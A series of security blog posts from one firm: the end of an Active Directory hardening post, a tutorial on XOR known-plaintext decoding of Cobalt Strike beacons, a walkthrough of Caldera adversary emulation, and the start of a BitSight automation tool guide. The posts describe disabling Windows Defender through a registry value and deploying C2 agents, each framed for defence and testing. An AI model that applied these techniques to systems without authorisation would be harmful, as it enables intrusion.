Figure 38: Windows Defender alert when downloading a malicious file
Figure 38: Windows Defender alert when downloading a malicious file

If a user can modify the Windows Defender Real-Time Protection registry key, they will be able to download and run malicious tools on the system. In this case, by setting the value to 1, the user disables the Real-Time Protection feature:

Figure 39: Modification of the DisableRealtimeMonitoring registry key
Figure 39: Modification of the DisableRealtimeMonitoring registry key

As expected, the Real-Time Protection is now disabled and the user can download malicious files:

Figure 40: Comparison when downloading a malicious file with Real-Time Protection enabled and disabled
Figure 40: Comparison when downloading a malicious file with Real-Time Protection enabled and disabled

To mitigate this vulnerability, it is recommended to ensure that registry and security policy settings defined in GPOs are always enforced and re-applied on systems even if the GPO has not changed. This way, any unauthorized changes made locally will be overridden after 5 minutes to 16 hours.

In the Default Domain Controller policy, under Computer Configuration > Administrative Templates > System > Group Policy, configure the following two settings as follows:

  1. Configure security policy processing:
    • Process even if the Group Policy objects have not changed: Enabled
    • Do not apply during periodic background processing: Disabled
  2. Configure registry policy processing:
    • Process even if the Group Policy objects have not changed: Enabled
    • Do not apply during periodic background processing: Disabled

The following settings can also be re-applied even if they have not been changed:

  • Internet Explorer Maintenance
  • IP Security
  • Recovery Policy
  • Wireless Policy
  • Disk Quota
  • Scripts
  • Folder Redirection
  • Software Installation
  • Wired Policy

Moreover, enabling auditing for registry operations can help your organization identify suspicious changes.

To audit registry key modification, the “Audit object access” policy needs to be enabled using a GPO (Figure 41).

Figure 41: GPO for auditing registry key modifications
Figure 41: GPO for auditing registry key modifications

After that, auditing also needs to be enabled on the registry keys that you want to monitor (Figure 42).

Figure 42: Enable auditing on the registry keys in Regedit
Figure 42: Enable auditing on the registry keys in Regedit

In this case, each time the value of a registry key under Windows Defender is modified, an event will be generated in the Event Viewer and can be used by the Blue team to identify suspicious activities.

Modification to registry keys can now be detected by looking at different event IDs (4656, 4657, 4660 and 4663).

In our example, we can see that the value of the DisableRealTimeMonitoring registry key was changed to 1 instead of 0:

Figure 43: Log showing that the value of the registry key has been modified
Figure 43: Log showing that the value of the registry key has been modified

Password policy and least privilege

This section includes recommendations related to the password policy of service accounts and the KRBTGT account.

The recommendations included in this section should be adapted to your company policy, specific use cases and risk tolerance.

Service accounts

During the audits, we noticed that most of the time, there is no password policy for service accounts, allowing administrators to set weak passwords that can be easily brute forced. In a few cases, the password for service accounts was even included in their description.

As shown in the “Administrator accounts are allowed for delegation” section, we cracked the IIS account password because weak passwords are allowed as there is no password policy enforced for service accounts. This could have been prevented by configuring a proper password policy.

For example, Microsoft recommends using passwords of at least 25 characters for service accounts and implementing a process for changing them regularly. Moreover, it is also recommended to use a dedicated Organizational Unit to manage this kind of accounts, making it easier to administrators to manage security settings applied to these accounts.

Finally, we also noticed that some organizations tend to use personal administrator accounts as service accounts. This means that if someone achieves to compromise a service account used by an administrator, they will have all privileges associated to this account. As a best practice, service accounts should only be granted the permissions they need.

KRBTGT account

The KRBTGT account is a default account that exists in all Active Directory domains. Its main purpose is to act as the Key Distribution Center (KDC) service account, which handles all Kerberos requests in the domain. As mentioned above, if an attacker achieves to compromise this account, they will be able to forge Golden Tickets and gain access to domain resources.

We noticed that many organizations do not change the KRBTGT password on a regular basis. Based on 25 audits, we found that the KRBTGT password is changed every 1855 days on average, and two organizations did not change the password for more than 5500 days, that’s over 15 years!

This means that an attacker, who was able to compromise the KRBTGT hash and has not been detected yet, can maintain his access for 5 years on average (if they have not created a backdoor yet).

It is recommended to change the password of the KRBTGT account regularly, for example every 6 months or every year.

Note that the password must be changed twice because the password history value for this account is set to 2. This means that the two most recent passwords will be valid for all already existing tickets. Before changing the password for the second time, best practices recommend waiting at least 24 hours to avoid invalidating existing Kerberos tickets and requiring everyone and everything (computers, servers, service accounts, etc.) to re-authenticate.

However, if you suspect that the KRBTGT account has been compromised by an attacker, the password should also be reset. This will prevent anyone who has access to its hash from generating Golden Tickets, for example.

It is important to keep in mind that changing the KRBTGT password will not ensure the security of your organization. If someone managed to get its hash once, they will probably be able to compromise it a second time if no other security measures are implemented.


In this blog post, we went over the most common misconfigurations and default settings discovered when doing Active Directory assessments of different environments. These configurations can have a significant impact on the security of your organization and allow attackers to gain access to the key of your kingdom.

Therefore, it is important to know your environment. Moreover, there should be a security baseline which should always be followed and reviewed regularly.

  • Is this configuration still required?
  • Is there any potential risk, any new vulnerabilities associated to this service?
  • Is there a more secure approach?

These are some of the questions IT administrators must repeatedly ask themselves to maintain a certain security posture.

Moreover, some tools allow you to perform automatic auditing of your AD environment and identify settings that could put your organization at risk:

  • PingCastle: It scans your environment to identify security vulnerabilities and weaknesses. It includes checks for stale objects (legacy protocols, never expiring password, etc.), privileges accounts (Kerberoastable admin accounts, delegations, etc.) and anomalies (print spooler, ADCS, audit policy, etc.).
  • BloodHound: It allows you to visualize Active Directory attack paths. It can be used to identify potential security vulnerabilities that could be exploited by an attacker with Domain Users privileges to elevate their privileges to Domain Admins, as an example.
  • Testimo: It is a PowerShell Module created by EvotecIT that helps you identify security issues as well as other operational issues. It can also generate HTML reports showing the commands executed, their output, a description and links to external resources.

While PingCastle and Testimo are more defender oriented, BloodHound is more attacker oriented.

In addition to performing regular scans, IT administrators should always keep an eye on newly discovered vulnerabilities, as a configuration that is considered safe can be the cause of a disaster a few years later. Indeed, it is important to note that no tool can guarantee complete security for your AD environment.

NVISO can help you identify and remediate vulnerabilities and weaknesses in your environment by performing an adversary emulation assessment which simulate real-world threats, as an example. These assessments will help you improve your security posture and protect your organization from potential threats.

To learn more about how we can help you, feel free to reach out or to check our website.

Bastien Bossiroy

Bastien Bossiroy

Bastien is a Senior Security Consultant at NVISO where he is part of the Software Security and Assessment team. He focuses mainly on web applications testing and Active Directory environments auditing.

During his free time, Bastien enjoys testing different Active Directory configurations to understand how they work and how specific settings or misconfigurations can impact the security of the environment.

XOR Known-Plaintext Attacks

In this blog post, we show in detail how a known-plaintext attack on XOR encoding works, and automate it with custom tools to decrypt and extract the configuration of a Cobalt Strike beacon. If you are not interested in the theory, just in the tools, go straight to the conclusion 🙂 .

A known-plaintext attack (KPA) is a cryptanalysis method where the analyst has the plaintext and ciphertext version of a message. The goal of the attack is to reveal the encryption algorithm and key.

XOR encoding intro

Let’s first agree on a notational convention:
Decimal integers are represented like this:


Hexadecimal integers are represented like this:


Let’s take the following plaintext message as example:

IT security company NVISO was founded in 2013!

And we XOR encode this with key ABC.
Like this:

Figure 1: XOR encoding with key ABC
Figure 1: XOR encoding with key ABC

This is how this works. Character per character, we perform an 8-bit XOR operation.

  • We take the first character of the plaintext message (I) and the first character of the key (A), we lookup their numeric value (according to the ASCII table): I is 0x49 and A is 0x41. Xoring 0x49 and 0x41 gives 0x08. In the ASCII table, 0x08 is a control character and thus unprintable (hence the thin rectangle in figure 1: this depicts unprintable characters).
  • We take the second character of the plaintext message (T) and the second character of the key (B), we lookup their numeric value (according to the ASCII table): T is 0x54 and B is 0x42. Xoring 0x54 and 0x42 gives 0x16. In the ASCII table, 0x16 is a control character and thus unprintable.
  • We take the third character of the plaintext message (space character) and the third character of the key (C), we lookup their numeric value (according to the ASCII table): is 0x20 and C is 0x43. Xoring 0x20 and 0x43 gives 0x63. In the ASCII table, 0x63 is lowercase letter c (lowercase and uppercase letters have different values: they have their 6th bit toggled).
  • We take the fourth character of the plaintext message (s) and the first character of the key (A), we lookup their numeric value (according to the ASCII table): s is 0x73 and A is 0x41. Xoring 0x73 and 0x41 gives 0x32. In the ASCII table, 0x32 is digit 2. Since our XOR key (ABC) is only 3 characters long, and the plaintext is longer than 3 characters, we start repeating the key. That is why we start again with the first character of the key (A) after having used the last character of the key (C) for the previous character. We roll the key.

This goes on, until we process the 46th character:

  • Character 1: we perform operation I xor A and that gives us unprintable character
  • Character 2: we perform operation T xor B and that gives us unprintable character
  • Character 3: we perform operation xor C and that gives us character c
  • Character 4: we perform operation s xor A and that gives us character 2
  • and so on ….
  • Character 46: we perform operation ! xor A and that gives us character `

This example explains how we XOR a plaintext message with a key that is shorter than the plaintext message: Plaintext XOR Key -> Ciphertext.

XOR cryptanalysis

XOR encoding has an interesting property, especially if you are interested in cryptanalysis. When you XOR the plaintext message with the ciphertext, you obtain the key: Plaintext XOR Ciphertext -> Key.

Figure 2: XORing plaintext and ciphertext gives keystream
Figure 2: XORing plaintext and ciphertext gives keystream

That’s how XOR encoding works. Let’s now see how we can decode this, without knowing the key, neither the complete plaintext, but just with a part of the plaintext.

In the case we are dealing with here, we have the complete ciphertext and partial plaintext. Under certain circumstances (explained later), it is also possible to recover the key in such a case.
Assume that the partial plaintext we have is NVISO: we know that the string NVISO appears in the plaintext (unknown to us), but we don’t know where.
So what we will do here, is repeat the string NVISO as many times as necessary to make it as long as the ciphertext (and hence as long as the plaintext). Like this:


When we perform XOR operations with the ciphertext and the repeating NVISO string, we obtain this result:

Figure 3: XORing ciphertext with partial known plaintext
Figure 3: XORing ciphertext with partial known plaintext

What we see here, is a string of 3 characters (CAB) that starts to repeat itself (CA) and has exactly the same length as the partial plaintext: NVISO is 5 characters, CABCA is 5 characters.
This is how you can identify the key: you look for repetition, that is in total as long as the partial plaintext. Substring CABCA is the only string that satisfies this condition in the XOR result in our example. yy and bib are also repeating strings, but they are shorter than the partial plaintext (5 characters).
And this also illustrates the most important condition for a partial KPA attack on XOR encoding to succeed: the partial plaintext must be longer than the XOR key. If the partial plaintext is as long, or shorter, than the XOR key, we will not observe repetition, and thus we will not be able to identify the key.
The string that contains our XOR key is CABCA. Since we assume that we are dealing with a rolling XOR key, the key can be ABC, BCA or CAB.
Let’s expand that string that contains our XOR key, to the left and to the right, so that it is as long as the ciphertext:

Figure 4: expanding the keystream to the left and to the right
Figure 4: expanding the keystream to the left and to the right

And finally, use that as the key stream for the XOR operation:

Figure 5: XORing the ciphertext with the expanded keystream
Figure 5: XORing the ciphertext with the expanded keystream

And now we have recovered the complete plaintext, by knowing a part of it that is longer than the XOR key used to encode the message.
We have designed our example so, that the ciphertext and partial plaintext align, like this:

Figure 6: for the purpose of this example, the plaintext and partial known plaintext align
Figure 6: for the purpose of this example, the plaintext and partial known plaintext align

If the number of characters preceding the ciphertext of partial plaintext NVISO would not be an exact multiple of the length of plaintext NVISO (20 / 4 = 5), then ciphertext and partial plaintext would not align properly, and we would not calculate the correct key.
For example, like this (I removed the leading word IT):

Figure 7: more likely, the partial known plaintext will not align
Figure 7: more likely, the partial known plaintext will not align

But this can be solved by “rolling” the partial plaintext. If our partial plaintext is 5 characters long, we have to generate 5 partial plaintext streams that we have to check:

Figure 8: trying with the 4th potential keystream
Figure 8: trying with the 4th potential keystream

In this example, it’s the fourth stream we generated that will align, and will thus reveal the key.

A partial KPA attack on XOR encoded ciphertext with a rolling XOR key, requires a partial, known plaintext that is longer than the XOR key. The bigger the difference in length, the easier it will be to identify the XOR key.

Doing all this decoding manually is a very intensive process. That’s why we have a tool to automate this process:

Let’s illustrate with our example.
This is the encoded file (ciphertext):

Figure 9: the ciphertext
Figure 9: the ciphertext

This is the file that contains the known plaintext:

Figure 10: the partial known plaintext
Figure 10: the partial known plaintext

Running tool with these 2 files as input gives:

Figure 11: lists potential keys
Figure 11: lists potential keys

We see that the tool recovers keystream CABCA, just like we did, and infers the right key from it: ABC.
Extra tells us how many characters are repeating (thus how many extra characters the partial plaintext has compared to the XOR key). The bigger this number, the more confident we can be that the correct key was recovered.
Divide tells us how many times the complete XOR key appears in the keystream.
And counts tells us how many times this ciphertext was found (in our example, that would mean that the word NVISO appears more than once in the plaintext). can also do the decoding for us (using option -d):

Figure 12: decoding with
Figure 12: decoding with

And here is an example, where the partial known plaintext is longer (was founded in 2013):

Figure 13: longer partial known plaintext
Figure 13: longer partial known plaintext
Figure 14: longer keystream
Figure 14: longer keystream

As the recovered keystream is much longer, the probability to extract the correct key is higher.


NVISO regularly encounters malware or artefacts that use XOR encoding with a key longer than one byte. Tool helps us to decode such files.

The tool comes with some predefined plaintexts, that appear often in samples (like “This program cannot be run in DOS mode”). We also included plaintexts for Cobalt Strike beacons.

When you run tool with the help option, you get a list of predefined plaintexts:

Figure 15: xor-kpa's options, including the predefined known plaintexts
Figure 15: xor-kpa’s options, including the predefined known plaintexts

All the predefined plaintexts that start with cs-, are for Cobalt Strike.

As a last example, we try to decode a file suspected to be an encoded Cobalt Strike beacon (beacon.vir). We will use cs-key-dot: this is the invariable part of the public key stored inside the beacon configuration for Cobalt Strike version 4:

Figure 16: xor-kpa displaying potential keys
Figure 16: xor-kpa displaying potential keys

Several potential keys are recovered, and the most likely key is presented at the end of the output. Potential key output is sorted by the amount of repetition in the keystream: the more repetition, the likelier the key is correct, and therefore listed lower than the keystreams with less repetition.

We can now use option -d to decode the sample with the most probable key (the last one in the list), and pipe the output to, a tool to extract beacon configurations:

Figure 17: xor-kpa decoding the beacon and 1768 extracting the beacon configuration
Figure 17: xor-kpa decoding the beacon and 1768 extracting the beacon configuration

Because of the decoding with xor-kpa, is able to extract the proper configuration.


Didier Stevens

Didier Stevens is a malware expert working for NVISO. Didier is a SANS Internet Storm Center senior handler and Microsoft MVP, and has developed numerous popular tools to assist with malware analysis.

A Beginner’s Guide to Adversary Emulation with Caldera

caldera logo

Target Audience

The target audience for this blog post is individuals who have a basic understanding of cybersecurity concepts and terminology and looking to expand their knowledge on adversary emulation. This post delves into the details of adversary emulation with the Caldera framework exploring the benefits it offers. By catering to a beginner to intermediate audience, the blog post aims to strike a balance between providing fundamental information for newcomers and offering valuable insights and techniques that can benefit individuals who are already familiar with the basics of cybersecurity.

What is Adversary Emulation

Adversary emulation is a methodology used to simulate the Tactics, Techniques, and Procedures (TTPs) used by known Advanced Persistent Threats (APTs), with the goal of identifying vulnerabilities in an organization’s security defenses. By emulating real-world attacks and incident response techniques, such as exploitation of vulnerabilities and lateral movement within a network, cybersecurity teams can gain a better understanding of their security posture and identify areas for improvement.

The Need for Adversary Emulation

Adversary emulation can help organizations test their security defenses against real-world threats. Some of the benefits the emulation offers are:

  • Identifying vulnerabilities: Adversary emulation assists organizations in identifying vulnerabilities, weaknesses or misconfigurations in their security defenses that might not have been detected through conventional security testing. This information can enhance the existing detection mechanisms by creating new alerts and rules that are triggered when similar activities are detected. The emulation results can also work as a guide in prioritizing mitigation and patching activities.
  • Improving security controls: By identifying weaknesses in their security defenses, organizations can make informed decisions about how to improve their security controls. This can include implementing new security technologies, updating security policies, or providing additional security awareness training to employees.
  • Measuring security effectiveness: Adversary emulation enables organizations to assess the effectiveness of their security defenses within a controlled environment. Through analyzing the emulation results, organizations can have a clearer understanding of how well their incidence response plan operates in real-world scenarios.If any gaps or inefficiencies are identified, the plan can be refined based on the new data.
  • Staying ahead of emerging threats: Adversary emulation exercises can help organizations stay ahead of emerging threats by testing their security defenses against new and evolving attack techniques. This can help organizations prepare for future threats and ensure that their security defenses are effective in protecting against them.

Emulation VS Simulation

Emulation involves creating a replica of a specific system or environment, such as an operating system, network, or application. It provides a more realistic testing environment, which can help identify vulnerabilities and test the effectiveness of security controls in a more accurate and reliable way. However, creating an emulation environment can be time-consuming and resource-intensive, and it may not always be feasible to replicate every aspect of a real-world environment.

Simulation, on the other hand, involves creating a hypothetical scenario that models a real-world attack. It is often quicker and easier to set up, and can be used to test response plans and procedures without the need for a complex emulation environment. However, simulations may not always provide a completely accurate representation of a real-world attack scenario, and the results may be less reliable than those obtained through emulation.

The Caldera Framework

MITRE’s Caldera project is an open-source platform that allows organizations to automatically emulate the tactics, techniques, and procedures (TTPs) used by real-world APTs. The platform is designed to be modular, which means that it can be customized to fit the specific needs of an organization. More information can be found in the official documentation and on GitHub. Red team operators can benefit from this by manually executing TTPs and blue team operators can run automated incident response actions. Caldera is also highly extensible, meaning that it can be integrated with other security tools to provide a comprehensive view of an organization’s security defenses. Moreover, it is built on the MITRE ATT&CK framework which is where the platform draws all the Tactics, Techniques and Procedures (TTPs) from.

Most common use cases of this framework include but not limited to:

  • Autonomous Red Team Engagements: This case is used to emulate the TTPs of known adversary profiles to discover gaps across an infrastructure, test the defenses currently in place and train operators on detection different threats.
  • Manual Red Team Engagements: This case allows red team operators to replace or extend the attack capabilities of a scenario, giving them more freedom and control over the current emulation.
  • Autonomous Incident Response: This case is used by blue team operators to perform automated incident response actions to aid them in identifying TTPs and threats that other security solutions may not detect and/or prevent.

Caldera consists of two main components:

  • The core system, which is the framework’s code, including an asynchronous command-and-control (C2) server with a REST API and a web interface.
  • Plugins which are separate repositories that expand the core framework capabilities and provide additional functionality. Examples include agents, GUI interfaces, collections of TTPs and more.

In Figure 1 below, we are greeted with when we login either as user red or blue and some basic terminology.

Caldera's Main Menu
Figure 1: Caldera’s Main Menu
  1. Agents: An agent is another name for Remote Access Trojan (RAT). These programs written in any language, execute an adversary’s instructions on compromised systems (victims). Often, an agent will communicate back to the adversary’s server through an internet protocol, such as HTTP, UDP or DNS. Agents also beacon into the C2 on a regular basis, asking the adversary if there are new instructions. If a beacon misses a regularly scheduled interval, there is a chance the agent itself has been discovered and compromised.
  2. Abilities: An ability is a specific set of instructions to be run on a compromised host by an agent immediately after sending the first beacon in.
  3. Adversaries: Adversary profiles are groups of abilities, representing the tactics, techniques, and procedures (TTPs) of known real-world APT groups. Adversary profiles are used when running an operation to determine which abilities will be executed.
  4. Operations: An operation is an attack scenario which uses the TTPs of pre-configured adversary profiles. An operation can be run automatically where the agents and the C2 server run without the operator’s interference and can only run tasks in the adversary profile. On the other hand, there is the manual mode where the operator approves every command before it is tasked to an agent and executed. Additionally in manual mode the operator can add extra TTPs. In order to run an operation at least one agent must be active.
  5. Plugins: They provide additional functionality over the usage of the framework.

Configuring an Agent

When we select “agents” from the figure 1 menu above, we are greeted with the figure 2 page.

Figure 2: Agent's Menu
Figure 2: Agent’s Menu

If we select the “Configuration” button, a new window opens where we can configure different options for all the agents created afterwards.

Agent's Configuration Menu
Figure 3: Agent’s Configuration Menu
  • Beacon Timer(s) = This fields sets the minimum and maximum amount of seconds the agent will take to beacon back home.
  • Watchdog Timer(s) = This field sets the number of seconds an agent has to wait, if the server is unreachable, before it is killed.
  • Untrusted Timer(s) = This field sets the number of seconds the server has to wait before marking a missing or unresponsive agent as untrusted. Furthermore, operations will not generate new links or send new instructions to untrusted agents.
  • Implant Name = This field sets the name for the newly created agents.
  • Bootstrap Abilities = This is a list of abilities to be run when a new agent beacons back to the server. By default, it runs a command which clears the command history.
  • Deadman Abilities = This is a list of abilities to be run immediately before an agent is killed.

To deploy an agent, we can press the “Deploy an Agent” button and we are greeted with this page. For this example, the agent Sandcat will be used.

By deploying the agent we refer to the process of installing and setting up the agent on the target system to enable it to perform specific actions or functions such as: monitoring, management, data collection, exploitation, reconnaissance and many more.

In figure 4, we can select the agent we want to deploy.

Agent Selection
Figure 4: Agent Selection

Next, in figure 5, we have to select the operating systems the agent will be deployed on.

Agent Platform Selection
Figure 5: Agent Platform Selection

In this example, the Linux operating system has been chosen and Caldera provides us with some options and some pre-built commands. These commands can be copied and run directly to the victim’s terminal for the agent to be deployed. There are different variations for the deployment of the selected agent such as:

  • It can be deployed as a red or blue agent.
  • It can be downloaded with a random name and start as a background process.
  • It can be deployed as a peer-to-peer (P2P) agent with known peers included in the compiled agent.

Moreover, the settings that can be modified are:

  • = This field is where the URL of the server’s address can be specified.
  • agents.implant_name = This field represents the name of the agent binary.
  • agent.extensions = This field takes a list of agent extensions to compile with the binary.
Agent's Deployment Options
Figure 6: Agent’s Deployment Options

After an agent has been deployed it will be shown in the agent’s window, as illustrated in Figure 7.

Active Agents
Figure 7: Active Agents

If an agent is selected, a new window opens that shows some settings that can be modified along with some information about the system the agent is installed on and a kill switch, as shown in figure 8.

Agent's Options After Deployment
Figure 8: Agent’s Options After Deployment
  • Contact = This field specifies the protocol in which the agent will communicate with the server.
  • Sleeper Timer = This is the same as the Beacon Timer(s).

Configuring an Adversary Profile

Caldera comes with pre-defined profiles to choose from, loaded with known TTPs. There is also the option to create a new profile with mixed TTPs, providing an operator more flexibility over the operation. An adversary profile can be created and configured in the “adversaries” window as shown below in figure 9.

Creating A New Adversary Profile
Figure 9: Creating A New Adversary Profile

After the “New profile” button is pressed, a name and a description for the new adversary profile will be asked.

A new ability can be added to the newly created profile by pressing the “add Ability” button.

Adding an Ability To an Adversary Profile
Figure 10: Adding an Ability To an Adversary Profile

Then a new window will open where the specific ability can be chosen and configured, as depicted in figure 11.

Configuring an Ability
Figure 11: Configuring an Ability

Here an already existing ability can be added by searching for it in the search bar or a new one can be configured by choosing a specific Tactic, Technique and Ability as shown above, along with all the details shown in the “Ability Details” section.

This newly created ability can be added to the TTPs of an already existing adversary profile by pressing the “Add Adversary” button. A new window will open to choose the appropriate profile.

Choosing an Adversary Profile
Figure 12: Choosing an Adversary Profile

Finally, by pressing the “Save Profile” button the new profile is created and can be added to an operation.

Save The New Profile
Figure 13: Save The New Profile

Configuring an Operation

An operation can be created and configured in the “operations” window.

Creating A New Operation
Figure 14: Creating A New Operation

After that a new window will open with all the modifiable settings.

Operation's Configuration
Figure 15: Operation’s Configuration
  • Operation Name = Specifies the name of the operation.
  • Adversary = Specifies a specific adversary profile to emulate along with the pre-configured TTPs associated with this profile.
  • Fact Source = In this field a fact source can be attached to the current operation. This means that the operations will start with some knowledge of the facts which can be used to fill in different variable inside some abilities. A fact is identifiable information about the target machine that can be used by some abilities, such as usernames, passwords, hostname etc.
  • Group = Specifies the collection of agents to run against
  • Planner = Specifies which logic library to use for the current operation. A planner is a Python module which contains logic that allows a running operation to make decisions about which abilities to use and in what order. The default planner is the “Atomic” which sends a single ability command to each agent in a group at a time. The order in which the commands are sent is the same as in the adversary’s profile.
  • Obfuscators = This field specifies which obfuscator to use to encode each command before they are sent to the agents. The available options are:
    • Base64 = Encodes the commands in base64
    • Base64jumble = Encodes the commands in base64 and then adds characters
    • Base64noPadding = Encodes the commands in base64 and then removes padding
    • Caesar cipher = Obfuscates the commands with the Caesar cipher algorithm
    • Plain text = No obfuscation
    • Steganography = Obfuscates the commands with image-based steganography
  • Autonomous = Specifies if the operations will run autonomously or manually. In manual mode the operator will have to approve each command.
  • Parser = Parsers are Python modules that are used to extract facts from command outputs. For instance, some reconnaissance commands can output file paths, usernames, passwords, shares etc. these facts can then be fed back into future abilities. Parsers can also be used to create facts with relationships between them, such as username and password facts.
  • Auto-close = This option automatically terminates the operation when there are no further actions left. Alternatively, it keeps the operation open until the operator terminates it manually.
  • Run state = This option pauses the operation on start or runs immediately
  • Jitter = Specifies the minimum and maximum number of seconds the agents will check in with the server while they are part of an active operations.
  • Visibility = This option specifies how visible should the operation be to the defense. Abilities with higher visibility than the operation’s will be skipped.

After the “start” button is pressed the operation will start and the results will be shown on the screen whether each task fails or succeeds. There is also the option to view each command and its result, as illustrated in figure 16.

Operation's results
Figure 16: Operation’s results

This was a red team operation, but in order to see the full picture some security solutions should also be running on the target systems to examine what was prevented and what went undetected.

Configure Automated Incident Response Plan

To form an incident response plan the “blue” user must be logged in.

The blue team’s main menu is a little different than the red team’s one. The main change is the “response plugin” which is a counterpart of the threat emulation plugins. At the time of writing this blog post, it contains 37 abilities and 4 defender profiles that focus on detection and response actions.

In the “Defenders” tab a new custom defender profile can be created and configured with the same way as the adversaries profile.

Incident Responder Section
Figure 17: Incident Responder Section

The profiles included in this plugin are:

  • Incident Responder
  • Elastic Hunter
  • Query Sysmon
  • Task Hunter

All available abilities for each defender profile can be viewed in the “abilities” section, after the specific profile has been chosen from the “response” tab, as shown in figure 17.

Defender Abilities
Figure 18: Defender Abilities

Defender abilities are classified by four different tactics:

  • Setup: These abilities prepare information to be used by other abilities
  • Detect: These abilities focus on finding suspicious behavior by continuously monitoring the ingested information and run as long as the operation is active.
  • Response: These abilities act autonomously once suspicious is detected. Such actions include, killing a process, modifying firewall rules, deleting of a file and so on.
  • Hunt: These abilities focus on searching for Indicators of Compromise (IOCs) via logs or file hashes.

Blue team operations are configured the same way as the red team operations. The main difference in the procedure is that the agent must be deployed as blue instead of red, in the “adversary” option a defender profile must be selected and in the Fact source section the “response” option must be selected.

Deploy Blue Agent
Figure 19: Deploy Blue Agent
Configuring A Blue Team Operation
Figure 20: Configuring A Blue Team Operation

The result structure is the same as the red team operation. The commands and their output are shown and whether they were successful or not.


In conclusion, leveraging the Caldera framework for adversary emulation presents a robust and proactive approach to enhancing cybersecurity defenses. Through the simulation of real-world attack scenarios, organizations can acquire invaluable insights into potential vulnerabilities and subsequently strengthen their incident response capabilities. The flexibility, modularity, and extensibility of Caldera establish it as an ideal tool for executing sophisticated emulation exercises.

By harnessing adversary emulation in conjunction with the Caldera framework, cybersecurity experts are equipped with the means to proactively safeguard their organizations against potential threats.

Profile photo

Konstantinos Pantazis

Konstantinos is a SOC analyst for NVISO security.
When he is not handling alerts, he is usually sharpening his skills for purple teaming.

Introducing BitSight Automation Tool

BitSight Automation Featured Image
  1. Glossary
  2. Introduction
  3. BitSight
  4. Automation
    1. Operations
  5. Structure
  6. Installation
    1. Prerequisites
    2. Configuration
    3. Generating an API key for your BitSight account
    4. Adding the API Key to the BitSight Automation Tool
      1. Windows
      2. Linux
    5. The group_mapper.json file
    6. The guid_mapper.json file
    7. Configuring your Company’s structure
      1. The groups.conf file
      2. Letting BitSight Automation Tool handle the rest
    8. Binding into Executable
  7. Execution
    1. Usage
    2. Use Cases
      1. Functional Operation: Rating
      2. Functional Operation: Historical
      3. Functional Operations: Findings
      4. Functional Operation: Assets
      5. Functional Operation: Reverse Lookup
      6. Supplementary Operation: List
      7. Supplementary Operation: Update
    3. Task Scheduler / Cron Jobs
      1. Windows – Task Scheduler
      2. Linux – Cron Jobs
  8. Troubleshooting
    1. Total Risk Monitoring Subscription Required
    2. File not Found *.JSON
  9. Conclusion


EntityA part of an organization that can be assessed as a single figure.
SubsidiarySame as an Entity on BitSight’s side.
Group ClusterA complex. It can contain entities/subsidiaries, or Groups, or more Group Clusters.
GroupA structure that can contain Entities.


In this blog post you will be introduced to the BitSight Automation Tool ( BitSight Automation was developed to automate certain manual procedures and extract information such as ratings, assets, findings, etc. Automating most of these tasks is crucial for simplicity and time saving. Besides that, this tool also provides the possibility to collaborate with Scheduled Tasks and cronjobs. You can configure the tool to execute in certain intervals or dates, and retrieve the results from the desired folder without needing to interact with it.


What is BitSight? BitSight is a solution that helps organizations perform three (3) main functions.

  1. Quantify their cyber risk
  2. Measure the impact of their security efforts
  3. Benchmark their performance against peers

It does all that by managing the company’s external facing infrastructure both automatically and manually, by allowing a company to provide updates to BitSight in order to keep their database up to date.

Other functions that are useful and provided by BitSight are:

  • Performing periodic vulnerability assessments on those assets to determine the risk factors and reports back the findings.
  • Identifies malicious activity such as botnet infections and much more that adds up to the risk factor.
  • Provides detailed remediation tips to remediate findings.


By utilizing parts of the BitSight API Python wrapper developed by InfosecSapper, we developed an open source tool for the community to use, that fully automates some of BitSight’s operations, which we have named BitSight Automation Tool. This tool has a lot of potential to expand further with even more operations based on the needs that might arise.


You might be wondering by this point, what operations can this tool automate? Currently we have 5 operations that can be automated + 2 supplementary to assist with the tool’s maintenance.

  1. Rating -> Retrieve the current score of an entity and confirm it’s above or equal to your company’s required security policies or digital mandate.
  2. Findings -> Generate a filtered list of vulnerabilities for an entity to remediate.
  3. Assets -> Retrieve the asset count and asset list of an entity, to validate your public IP space.
  4. Reverse Lookup -> Investigate where an IP, IP Range, domain or domain wildcard is attributed to and what IPs or domains it is associated with.
  5. Historical Ratings -> Sets up an overview of ratings for a given entity or group over a specified timeframe (maximum 1 year) to showcase in reports and review progress or regress.
  • List ->  Review the correlation between an entity’s custom given name and BitSight’s given name in a list for all defined entities.
  • Update -> Automatically update the tool and its respective JSON files.


The below image is a representation of the current state of the tool. At the time of writing the tool comes with the following structure.

  • BitSightAPI: This folder contains certain vital Python files from the BitSightAPI Python wrapper.
  • This file contains the instructions on how to parse the tool’s arguments.
  • This file is your friend. It contains all the information on how to execute with examples, as well as troubleshooting advice.
  • This file is the heart of the tool. You can execute this Python file and use it for your Scheduled tasks or cron jobs.
  • group_mapper.json: This file is a JSON structure which represents the mapping of the groups and entities within your organization. (More on this in a dedicated section)
  • guid_mapper.json: This file is a JSON structure which represents the mapping of the entities and their respective GUIDs assigned to them by BitSight. (A GUID is the unique handle used by BitSight to identify your subsidiary)
  • groups.conf: This file is the main configuration to define your groups. It defines the groups which the tool will interact with.
  • requirements.txt: This file indicates all the required libraries for the tool to operate.
Files Diagram
Figure 1: Files Diagram



In order to use the tool, we first need to install it. Regardless of the Operating System you are using, you will need to have Python installed. The tool has been tested with Python 3.8 and 3.11 at the time of writing, so any Python 3.x.x version should work.

Note: When installing Python make sure to include it in your PATH and include the PIP package manager as well.

Next step would be to install the tool’s requirements. To do so, navigate to the tool’s directory within a command prompt / terminal or PowerShell window and execute the following command: `pip install -r requirements.txt`

All the prerequisites are installed at this point, but we still have a couple more steps to perform before we can use the tool.


Now that you have installed the prerequisites, we are one step closer to utilizing the tool. Before we do so, we need to update a couple of files.

Generating an API key for your BitSight account

First you need to generate an API key from your account in BitSight. To do so,

  1. Login to your BitSight account
  2. On the top right corner of the UI, click on Settings.
  3. Select Account
  4. Scroll down until you see an “API Token” section
  5. Select “Generate API Token
  6. Copy the newly generated token.

Adding the API Key to the BitSight Automation Tool

In order for the BitSight Automation Tool to use this API key, you need to include it as an environmental variable in the system you will be running the tool on. We’ll do so below for both Windows and Linux.


For Windows systems,

  1. Open the search menu
  2. Search for “Edit the System Environment Variables
  3. Select that option
  4. Select “Environment Variables
  5. On the “User Variables” click “New
  6. In the “Variable Name” field, add the value “BITSIGHT_API_KEY
  7. In the “Variable Value” field, add the generated token you copied in the previous section.


For Linux systems,

  1. Open a terminal
  2. Replace the “{token}” section with your token, and execute the following command:
echo export BITSIGHT_API_KEY={token} >> ~/.bashrc

The group_mapper.json file

